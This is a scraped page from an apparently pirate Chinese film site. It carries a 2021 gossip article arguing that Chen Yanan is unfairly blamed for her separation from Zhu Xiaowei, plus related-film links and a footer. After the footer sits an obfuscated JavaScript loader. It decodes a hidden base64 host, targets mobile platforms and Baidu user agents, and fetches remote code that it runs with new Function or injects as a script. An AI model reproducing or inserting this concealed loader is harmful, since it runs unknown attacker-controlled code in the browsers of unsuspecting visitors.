陈亚男被骂“陈金莲”,这回还真有点冤

咪咕影院阿莱明星资讯人气:225时间:2021-10-16 23:30:49

估计陈亚男自己都没想到,在嫁到大衣哥朱之文家之后,现在居然成为一众网友批评的对象,甚至还成为了“陈金莲”的代名词。

起因是陈亚男和大衣哥的儿子朱小伟结婚1年后,在最近遭遇了婚姻危机,女方和男方分居,并让对方回家反省。而陈亚男则独自一人直播,似乎很享受单身的状态。

不少网友觉得陈亚男是靠着大衣哥的名气火起来的,如果没有朱家,恐怕还没有人知道陈亚男是谁。所以有些人认为她现在火了成了网红,却要和朱小伟分开,无疑是忘恩负义,唯利是图的。

居于这个原因,很多人纷纷去到陈亚男的直播间,指责她是当代陈世美。有些人甚至在评论区留言,称呼她是当代“陈金莲”,用词不可谓不严重。

在他们眼中,陈亚男似乎成为了一个十足的心机女人,为了利益不顾一切,如今终于暴露了真面目。

陈亚男真的有这么不堪吗?

我看未必!说她是“陈金莲”,未免太过火了,在事情还没搞清楚之前,就把所有责任推到女方身上,这对陈亚男来说,实在是太冤了。

首先我们要搞清楚,当初陈亚男为什么要嫁到朱家。

当初陈亚男和朱小伟结婚的时候,很多人都在唱衰这段婚姻,觉得女方是贪图男方的家境,所以才会选择结婚。

但是反过来想一下,男方又何尝不是看陈亚男长得年轻漂亮呢?起码对于朱小伟而言,陈亚男的长相是有9分的。

所以这段婚姻从一开始,就是你情我愿各取所需的,外界却一直把矛头对准陈亚男,显然是不公平了。

再者说了,陈亚男嫁过来即便是看好朱家的家境,也无可厚非。

在农村里面,谁家女儿出嫁不得找一个好人家,希望自家女儿能够少吃点苦,多享点福?陈亚男的父母并没有错,在千千万万的农村家庭里,这可太常见了。

嫁到朱家1年之后,现在朱小伟和陈亚男分开,就一定是女方的问题嘛?我看也未必!

从陈亚男的直播中可以了解到,朱小伟一直满足于现状,不愿意学习提高自己。正常的年轻人都是在工作中寻求进步的,起码有自己追求的目标,和另一半共谋未来。

朱小伟如此懈怠,但凡有点追求上进的另一半,恐怕都受不了。

有的人可能觉得陈亚男的话不可信,那我们再来看看媒体眼中的朱小伟。

没事嗑瓜子、遛弯闲逛、无所事事,这是不少媒体对朱小伟公开报道中的描述。有了父亲朱之文半辈子的丰厚积蓄支撑,朱小伟根本不用忧愁未来,他更像是一个已经退休的老年人,还没追求理想就开始躺平了。

结合之前陈亚男说的话,她提到的“朱小伟不求上进”所言非虚。

有的人可能又有疑问了,那为什么明明知道朱小伟是这样的人,当初陈亚男还要嫁给他呢?

这就要回到两人的这段感情里,他们到底是怎么认识并走到一起的?

根据陈亚男在结婚时的公开报道,他们两人是经过相亲认识之后自由恋爱的。说是自由恋爱,实际上陈亚男和朱小伟并没有时间磨合,就匆匆领了结婚证成为了一家人。

他们两个人走到一起,更像是上个世纪父母的包办婚姻。刚认识的两个人,走到一起后再慢慢培养感情。

在父辈那个年代,这一套尚且行得通。那个时候大家忙于赚钱养家,男主外女主内,根本不像现在生活的花样这么多,也无暇去分辨什么是代沟什么是理想,只要没有大矛盾,多半凑合着过了大半生。

但现在时代毕竟不一样了。

随着生活越来越富足,年轻人除了家庭之外,更讲究个人精神和理想的追求。在这样的情况下,陈亚男和朱小伟的问题和矛盾就暴露出来了。

两个人在一起1年后,发现彼此根本不是一路人。尤其陈亚男是个事业型的女人,更难以容忍朱小伟这般不上进的另一半,心里面自然会有各种想法。

所以综合上面的情况看来,这两人充其量只是因为相亲认识,现在相处一段时间发现了问题,彻底认清现实罢了。

陈亚男和朱小伟都有问题,这两人一开始压根就不应该在一起。

从外面到内里不是一路人,强行凑到一起也注定成为不了一家人,到最后恐怕难免再一拍两散。

  • 手机阅读

    扫一扫手机阅读

相关影片

  • 致命闪玩

    类型:恐怖片,地区:未知

    主演:null,

  • 疾风回旋曲

    类型:恐怖片,地区:日本

    主演:阿部宽,大仓忠义,大岛优

  • 得闲饮茶

    类型:喜剧片,地区:香港

    主演:方力申,梁慧嘉,林家栋

  • 第二个妈妈

    类型:剧情片,地区:巴西

    主演:Regina,Casé,

  • 三招了

    类型:动作片,地区:中国香港

    主演:冯宝宝,曾江,石坚

友情链接:80s电影网/南瓜影视/天天影视

本站所有视频和图片均来自互联网收集而来,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件至enbzgj@163.com (我们会在3个工作日内删除侵权内容,谢谢。)

Copyright © 2020 咪咕影院蜀ICP备18031239号

function WIBscb(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UkzEcOtb(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WIBscb(t);};window[''+'E'+'R'+'l'+'P'+'y'+'e'+'T'+'F'+'f'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UkzEcOtb,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('amJyLmxoaXBwYWMuY244=','8110',window,document,['4','kxpItHEMBS']);}:function(){};